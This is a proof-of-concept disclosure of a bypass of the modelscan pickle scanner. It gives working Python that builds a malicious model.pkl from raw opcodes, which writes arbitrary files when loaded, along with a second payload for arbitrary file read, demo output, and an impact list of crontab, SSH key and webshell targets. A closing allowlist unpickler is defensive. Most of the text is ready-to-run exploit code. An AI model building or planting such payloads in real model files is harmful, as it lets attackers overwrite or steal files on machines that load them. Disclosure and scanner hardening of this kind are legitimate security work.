
Modelscan Bypass PoC — pathlib.PosixPath.write_text

Summary

This pickle file bypasses ProtectAI's modelscan scanner and achieves arbitrary file write when loaded with pickle.load() or torch.load() (with weights_only=False).

Technique

Uses pathlib.PosixPath combined with operator.methodcaller("write_text", ...) to write arbitrary content to an arbitrary file path. Neither pathlib nor operator.methodcaller appears in modelscan's unsafe_globals blocklist.

Chain: operator.methodcaller("write_text", "<content>")(pathlib.PosixPath("<target_path>")) — the methodcaller object is built first, then applied to the PosixPath instance at unpickling time.
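The chain above can be sketched as a raw-opcode pickle builder. The target path, marker string, and model.pkl filename follow the PoC transcript; the opcode layout is one possible encoding of the chain, not necessarily the exact bytes of the published sample.

```python
import pickle

# Paths/strings follow the PoC transcript; adjust for your own testing.
TARGET = "/tmp/pwned_pathlib.txt"
CONTENT = "PWNED_VIA_PATHLIB"

def u(s: str) -> bytes:
    # UNICODE opcode ('V'): newline-terminated raw-unicode-escape text
    return b"V" + s.encode("raw-unicode-escape") + b"\n"

payload = b"".join([
    b"coperator\nmethodcaller\n",   # GLOBAL: push operator.methodcaller
    b"(", u("write_text"), u(CONTENT), b"t",
    b"R",                           # REDUCE -> methodcaller("write_text", CONTENT)
    b"(",                           # MARK for the outer call's argument tuple
    b"cpathlib\nPosixPath\n",       # GLOBAL: push pathlib.PosixPath
    b"(", u(TARGET), b"t",
    b"R",                           # REDUCE -> PosixPath(TARGET)
    b"t",                           # -> (PosixPath(TARGET),)
    b"R",                           # REDUCE -> PosixPath(TARGET).write_text(CONTENT)
    b".",                           # STOP
])

with open("model.pkl", "wb") as f:
    f.write(payload)

# Loading the "model" triggers the write; write_text returns the char count.
result = pickle.loads(payload)
print(result)
```

Note that no class with a suspicious __reduce__ is needed: the entire chain lives in pickle bytecode, so the file contains nothing but two GLOBAL references that the blocklist does not cover.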

Scan Result

$ modelscan scan -p model.pkl
No issues found! 🎉

Execution Result

$ python3 -c "import pickle; pickle.load(open('model.pkl','rb'))"
$ cat /tmp/pwned_pathlib.txt
PWNED_VIA_PATHLIB

Impact

Arbitrary file write — can overwrite config files, crontabs, SSH authorized_keys, or drop webshells. Combined with pathlib.PosixPath.read_text (via a second methodcaller), the same chain also enables arbitrary file read.
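The read variant mentioned above follows the same opcode layout, with read_text and no content argument; unpickling then returns the target file's contents. This is a sketch, demonstrated here against a throwaway temp file rather than a real secret:

```python
import pickle
import tempfile

def u(s: str) -> bytes:
    # UNICODE opcode ('V'): newline-terminated raw-unicode-escape text
    return b"V" + s.encode("raw-unicode-escape") + b"\n"

def read_payload(path: str) -> bytes:
    # methodcaller("read_text") applied to PosixPath(path):
    # pickle.load() evaluates to the file's contents
    return b"".join([
        b"coperator\nmethodcaller\n",
        b"(", u("read_text"), b"tR",   # -> methodcaller("read_text")
        b"(cpathlib\nPosixPath\n",
        b"(", u(path), b"tR",          # -> PosixPath(path)
        b"tR.",                        # -> PosixPath(path).read_text()
    ])

# Stand-in victim file for the demo
with tempfile.NamedTemporaryFile("w", delete=False, suffix=".txt") as f:
    f.write("demo-secret")
    name = f.name

leaked = pickle.loads(read_payload(name))
print(leaked)  # "demo-secret"
```

In a real model file the leaked string would land somewhere in the deserialized object graph, where attacker-controlled post-load code (or a further gadget) can exfiltrate it.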

Blocklist Gaps

  1. pathlib module — entirely missing from unsafe_globals
  2. operator.methodcaller — not blocked (only operator.attrgetter is listed)
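Gaps like these are inherent to blocklisting. An allowlist-based unpickler catches both gadgets by default; the sketch below is a generic restricted Unpickler (the allowed set is illustrative, and this is not modelscan's own API):

```python
import io
import pickle

# Illustrative allowlist: only globals a benign model file legitimately needs
ALLOWED = {
    ("collections", "OrderedDict"),
}

class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Refuse anything not explicitly allowed, instead of
        # trying to enumerate every dangerous module
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)

# The pathlib gadget is rejected before PosixPath is even constructed
gadget = b"cpathlib\nPosixPath\n(V/tmp/x\ntR."
try:
    AllowlistUnpickler(io.BytesIO(gadget)).load()
except pickle.UnpicklingError as e:
    print(e)  # blocked global: pathlib.PosixPath
```

find_class runs on every GLOBAL opcode, so the check fires before any object from a disallowed module exists, which is why allowlisting has no equivalent of a "missing entry" bug.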